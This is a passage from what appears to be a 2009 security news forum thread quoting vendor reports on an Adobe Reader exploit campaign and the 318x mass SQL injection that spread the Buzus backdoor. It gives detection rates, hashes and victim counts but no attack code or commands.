• Adobe Reader and Acrobat 8.1.1 buffer overflow CVE-2007-5659
• Adobe Acrobat and Reader 8.1.2 buffer overflow CVE-2008-2992 ...
If the user's browser is successfully exploited, a malicious file is downloaded and run in the user's Windows home directory from another collaborated exploit site. The malicious file (SHA1: 6776489a0ed889fbabb317763c7c913fdc782631) has an extremely low AV detection rate* at the time the file was checked..."
* http://www.virustotal.com/analisis/ed4555f62fb463a42ea399bbdd8594e2f6ed0c6195831200840013a2541c7c84-1257416198
File file.exe received on 2009.11.05 10:16:38 (UTC)
Result: 2/40 (5.00%)

(Screenshot available at the Websense URL above.)


2009-12-10, 19:39

303,000+ hit by SQL injection
- http://www.net-security.org/secworld.php?id=8604
10 December 2009 - "A large scale SQL injection attack has injected a malicious iframe on tens of thousands of susceptible websites. ScanSafe reports* that the injected iframe loads malicious content from 318x .com, which eventually leads to the installation of a rootkit-enabled variant of the Buzus backdoor trojan. A Google search on the iframe resulted in over 132,000 hits as of December 10, 2009..."
* http://blog.scansafe.com/journal/2009/12/9/318x-sql-injection-claims-125000.html
"... Detection of the trojan is spotty, with 22/40 antivirus vendors detecting the variant according to this VirusTotal report**..."
** http://www.virustotal.com/analisis/f7637523c5aa2c0c2ddcb8cbc895732ed4a9ca83976885c3d458350e1d203f2a-1260300034
File 8ad31d8d6fc4cb12c9beec93d62d340e received on 2009.12.08 19:20:34 (UTC)
Result: 22/40 (55.00%)

- http://blog.scansafe.com/journal/2009/12/10/318x-compromises-bigger-on-yahoo.html
December 10, 2009 - "... a Yahoo search on the 318x iframe reveals a considerably higher number of hits. Does this mean Google is capping the SERPs at some arbitrary point? Curently, Yahoo is showing 303,000 on my end while a Google search on the 318x iframe is showing 159,000 (up from 125,000 yesterday and 132,000 earlier today)."

- https://www.sans.org/newsletters/newsbites/newsbites.php?vol=11&issue=97#sID300
December 10, 2009 - "... A newly-detected SQL injection attack has infected nearly 300,000 web pages with an invisible iframe that gathers malicious code from a series of web sites. The malware seeks vulnerable versions of Adobe Flash, Internet Explorer (IE) and other applications on users' computers and then installs malware that steals online banking credentials."

- http://google.com/safebrowsing/diagnostic?site=318x.com/
"... last time Google visited this site was on 2009-12-15, and the last time suspicious content was found on this site was on 2009-12-15. Malicious software includes 5853 trojan(s), 3423 scripting exploit(s), 1 exploit(s)..."